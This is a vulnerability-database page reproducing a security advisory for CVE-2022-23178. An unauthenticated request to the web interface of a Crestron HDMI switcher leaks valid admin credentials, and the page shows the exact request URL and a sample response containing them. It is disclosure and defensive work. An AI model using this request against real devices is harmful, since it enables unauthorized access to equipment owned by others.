Lucene search
K

Crestron HD-MD4X2-4K-E 1.0.0.2159 Credential Disclosure Vulnerability

🗓️ 13 Jan 2022 00:00:00Reported by RedTeamType 
zdt
 zdt
🔗 0day.today👁 467 Views

Credential Disclosure in Crestron HD-MD4X2-4K-E 1.0.0.215

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Creston Web Interface 1.0.0.2159 - Credential Disclosure Vulnerability
18 Jan 202200:00
zdt
ATTACKERKB
CVE-2022-23178
15 Jan 202215:17
attackerkb
Circl
CVE-2022-23178
15 Jan 202218:50
circl
CNNVD
Crestron Hd-Md4X2-4K-E 授权问题漏洞
12 Jan 202200:00
cnnvd
CVE
CVE-2022-23178
15 Jan 202214:40
cve
Cvelist
CVE-2022-23178
15 Jan 202214:40
cvelist
Exploit DB
Creston Web Interface 1.0.0.2159 - Credential Disclosure
18 Jan 202200:00
exploitdb
Nuclei
Crestron Device - Credentials Disclosure
8 Jun 202604:09
nuclei
NVD
CVE-2022-23178
15 Jan 202215:17
nvd
Packet Storm
Crestron HD-MD4X2-4K-E 1.0.0.2159 Credential Disclosure
12 Jan 202200:00
packetstorm
Rows per page
Credential Disclosure in Web Interface of Crestron Device


When the administrative web interface of the Crestron HDMI switcher is
accessed unauthenticated, user credentials are disclosed which are valid
to authenticate to the web interface.

Details
=======

Product: Crestron HD-MD4X2-4K-E
Affected Versions: 1.0.0.2159
Fixed Versions: -
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
Advisory Status: published
CVE: CVE-2022-23178
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178


Introduction
============

"Crestron sets the gold standard for network security by leveraging the
most advanced technologies including 802.1x authentication, AES
encryption, Active Directory® credential management, JITC Certification,
SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to
provide network security at the product level."

(from the vendor's homepage)


More Details
============

Upon visiting the device's web interface using a web browser, a login
form is displayed requiring to enter username and password to
authenticate. The analysis of sent HTTP traffic revealed that in
addition to the loading of the website, a few more HTTP requests are
automatically triggered. One of the associated responses contains a
username and a password which can be used to authenticate as the
affected user.


Proof of Concept
================

Requesting the URL "http://crestron.example.com/" via a web browser
results in multiple HTTP requests being sent. Among others, the
following URL is requested:

------------------------------------------------------------------------
http://crestron.example.com/aj.html?a=devi&_=[...]
------------------------------------------------------------------------

This request results in a response similar to the following:

------------------------------------------------------------------------
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-type: text/html

{
  "login_ur": 0,
  "front_val": [
    0,
    1
  ],
  "uname": "admin",
  "upassword": "password"
}
------------------------------------------------------------------------

The values for the keys "uname" and "upassword" could be used to
successfully authenticate to the web interface as the affected user.


Workaround
==========

Reachability over the network can be restricted for access to the web
interface, for example by using a firewall.


Fix
===

No fix known.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jan 2022 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 3.19.8
CVSS 210
EPSS0.92106
467